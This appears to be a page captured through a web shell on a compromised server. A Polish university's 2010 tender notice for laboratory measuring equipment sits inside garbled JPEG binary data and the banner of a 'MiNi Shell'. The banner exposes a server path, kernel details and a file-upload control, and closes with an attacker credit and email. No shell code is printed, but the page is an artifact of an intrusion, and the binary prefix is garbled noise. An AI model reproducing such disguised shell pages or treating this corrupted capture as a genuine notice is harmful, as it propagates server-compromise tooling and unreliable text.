JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100621/175412-N-2010.html

<p class="kh_header"><b>Katowice: DOSTAWA APARATURY POMIAROWEJ</b><br>
<b>Numer ogłoszenia: 175412 - 2010; data zamieszczenia: 21.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 032 3592048, faks 032 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA APARATURY POMIAROWEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowej (rok produkcji - 2010) aparatury pomiarowej (zwanej dalej: sprzętem). W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do dostarczenia, montażu, uruchomienia, a także do przeprowadzenia szkolenia użytkowników sprzętu w zakresie jego obsługi. Miejscem dostarczenia przedmiotu zamówienia będzie siedziba Zamawiającego.<BR> 
2. Opis przedmiotu zamówienia stanowią załączniki nr od 2A do 2 E do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).<BR> 
3. Zamawiający  dopuszcza możliwość składania ofert częściowych zgodnie z podziałem:<BR>
a) część A - Spektrofotometr UV/VIS do analizy RNA 1 szt.,<BR>
b) część B - Spektrofluorymetr 1 szt.,<BR>
c) część C - System do ilościowego oznaczania PCR w czasie rzeczywistym 1 szt.,<BR>
d) część D - Przystawka nisko i średniotemperaturowa do dyfraktometru D/MAX Rapid II 1 szt.,<BR>
e) część E -  Spektrofotometr UV/VIS 1 szt.<BR>
4. Okres gwarancji na urządzenia:<BR>
a) w zakresie części A - minimum 24 miesiące,<BR>
b) w zakresie części B - minimum 12 miesięcy,<BR>
c) w zakresie części C - minimum 24 miesiące,<BR>
d) w zakresie części D - minimum 12 miesięcy,<BR>
e) w zakresie części E - minimum 12 miesięcy.<BR>
5. Serwis gwarancyjny i pogwarancyjny w kraju.<BR>
6. Czas naprawy w okresie gwarancji - 14 dni.<BR>
7. Zamawiający dopuszcza możliwość realizacji zamówienia z udziałem podwykonawców w zakresie dostarczenia (transportu) sprzętu.<BR>
8.Wszelkie rozliczenia finansowe dokonywane między Zamawiającym a Wykonawcą  dokonywane będą w polskich złotych (PLN).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.54.00.00-2, 38.41.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium:<BR>
1.  Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:<BR>
-   w zakresie części A - 615,00 PLN - sześćset piętnaście 00/100,<BR>
-   w zakresie części B - 2.700,00 PLN - dwa tysiące siedemset 00/100,<BR>
-   w zakresie części C - 6390,00 PLN - sześć tysięcy trzysta dziewięćdziesiąt 00/100,<BR>
-   w zakresie części D - 4600,00 PLN - cztery tysiące sześćset 00/100,
-   w zakresie części E - 540,00 PLN - pięćset czterdzieści 00/100,

2.  Wadium może być wniesione:<BR>
 - w pieniądzu, na rachunek Zamawiającego:<BR>
    ING Bank Spółka Akcyjna o/Katowice,<BR> 
    nr rachunku: 29 1050 1214 1000 0022 0331 4816 lub<BR>
 - w poręczeniach bankowych lub w poręczeniach spółdzielczej kasy    oszczędnościowo-kredytowej (zobowiązanie pieniężne) lub <BR>
-  w gwarancjach bankowych lub w gwarancjach ubezpieczeniowych lub <BR>
-  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.  2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju
     Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z pózn. zm.).<BR>
3. Za datę wniesienia wadium przelewem uważa się datę uznania rachunku bankowego Zamawiającego.<BR>
4. Wymagania dotyczące wadium wnoszonego w formie gwarancji i poręczeń:<BR>
- nie budzące wątpliwości, zobowiązanie gwaranta lub poręczyciela do zapłaty
beneficjentowi / wierzycielowi (Zamawiającemu) należności, w przypadku gdy oferta
zleceniodawcy / dłużnika (Wykonawcy) została wybrana, a:<BR>
1) zleceniodawca / dłużnik (Wykonawca) odmówił podpisania umowy w sprawie
zamówienia publicznego na warunkach określonych w ofercie;<BR>
2) zleceniodawca / dłużnik (Wykonawca) nie wniósł wymaganego zabezpieczenia
należytego wykonania umowy;<BR>
3) zawarcie umowy w sprawie zamówienia publicznego stało sie niemożliwe
z przyczyn leżących po stronie zleceniodawcy / dłużnika (Wykonawcy).<BR>
- zobowiązanie gwaranta / poręczyciela winno być nieodwołalne, bezwarunkowe     i  płatne na pierwsze żądanie beneficjenta / wierzyciela (Zamawiającego).<BR>
- gwarancja / poręczenie winny spełniać wymogi określone we właściwych
 przepisach. Powyższe warunki muszą wynikać z gwarancji lub poręczenia.<BR>
5. Wadium, bez względu na sposób jego wniesienia, musi obejmować cały okres związania ofertą, o którym mowa w rozdziale VI pkt 2  SIWZ.<BR>
6. W przypadkach, o których mowa w rozdziale VI pkt ważności wadium albo jeżeli nie jest to możliwe, do wniesienia nowego wadium na przedłużony okres związania ofertą. Wykonawca dokonuje przedłużenia okresu ważności wadium samodzielnie lub na wniosek Zamawiającego zgodnie z przepisem art. 85 ust. 2 ustawy Pzp albo na wezwanie Zamawiającego, zgodnie z przepisem art. 184 ustawy Pzp.<BR>
7.  W przypadku wniesienia wadium przelewem zaleca się, aby Wykonawca dołączył do oferty kserokopię dokonania przelewu.<BR>
8.  W przypadku wniesienia wadium w pozostałych formach (gwarancje, poręczenia) oryginał dokumentu potwierdzającego wniesienie wadium Wykonawca winien dołączyć do oferty.<BR>
9.  Zamawiający dokona zwrotu wadium Wykonawcom zgodnie z postanowieniami
art. 46 ust. 1 - 4 ustawy Prawo zamówień publicznych.<BR>
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:<BR>
1)  w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,<BR>
2) którego oferta została wybrana:<BR>
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<BR>
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<BR>
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<BR></p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia powyższy warunek udziału w postępowaniu zgodnie z formułą: spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu opisanego w rozdz. IV pkt 1.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia powyższy warunek udziału w postępowaniu zgodnie z formułą: spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu opisanego w rozdz. IV pkt 1.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia powyższy warunek udziału w postępowaniu zgodnie z formułą: spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu opisanego w rozdz. IV pkt 1.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia powyższy warunek udziału w postępowaniu zgodnie z formułą: spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu opisanego w rozdz. IV pkt 1.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia powyższy warunek udziału w postępowaniu zgodnie z formułą: spełnia/nie spełnia, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu opisanego w rozdz. IV pkt 1.1 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny atest PZH lub równoważny dla komory laminarnej (w ramach systemu do ilościowego oznaczania PCR w czasie rzeczywistym - część C postępowania), protokół z badania integralności filtrów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji na sprzęt - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana treści umowy może nastąpić wyłącznie w granicach unormowania art.144 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych 
i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego 
po podpisaniu przez obie Strony.<BR>
Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy
w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy,
wyłącznie w sytuacji:  zmiany terminu dostawy, w sytuacji uzasadnionej, gdy brak możliwości dochowania pierwotnego terminu dostawy wynika z przyczyn niezawinionych przez Wykonawcę np. siła wyższa, Zamawiający może wyrazić zgodę na zmianę terminu. Wykonawca na piśmie przedstawi okoliczności uniemożliwiające dochowanie terminu dostawy wynikającego z oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.us.edu.pl/zamowienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UNIWERSYTET ŚLĄSKI ul. Bankowa 12, IIIp. pok.69 40-007 KATOWICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2010 godzina 10:30, miejsce: UNIWERSYTET ŚLĄSKI ul. Bankowa 12, IIIp. pok.69 40-007 KATOWICE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia w ramach części A, B i C postępowania realizowany jest w ramach projektu:<BR>
 Zintegrowany system wspomagający zarządzaniem i ochroną zbiornika zaporowego
(ZiZOZap) realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka, lata 2007-2013, Priorytet: 1. Badania i rozwój nowoczesnych technologii; Działanie: 1.1 Wsparcie badań naukowych dla budowy gospodarki opartej na wiedzy,  Poddziałanie 1.1.2 Strategiczne programy badań naukowych i prac rozwojowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część A - Spektrofotometr UV/VIS do analizy RNA 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spektrofotometr UV/VIS do analizy RNA 1 szt. zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 2A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.54.00.00-2, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji na sprzęt - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część B - Spektrofluorymetr 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spektrofluorymetr 1 szt. zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 2B.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.54.00.00-2, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 84.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji na sprzęt - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część C - System do ilościowego oznaczania PCR w czasie rzeczywistym 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> System do ilościowego oznaczania PCR w czasie rzeczywistym 1 szt. zgodnie z opisem przedmiotu zamówienia stanowiacym załacznik nr 2C.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.54.00.00-2, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji na sprzęt - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część D - Przystawka nisko i średniotemperaturowa do dyfraktometru D/MAX Rapid II 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przystawka nisko i średniotemperaturowa do dyfraktometru D/MAX Rapid II 1 szt. zgodnie z opisem przedmiotu zamówienia stanowiącym załącznik nr 2D do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.54.00.00-2, 38.41.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 84.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji na sprzęt - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> część E -  Spektrofotometr UV/VIS 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spektrofotometr UV/VIS 1 szt. zgodnie z opisem przedmiotu zamówienia stanowiacym załącznik nr 2E do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.50.00.00-0, 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji na sprzęt - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com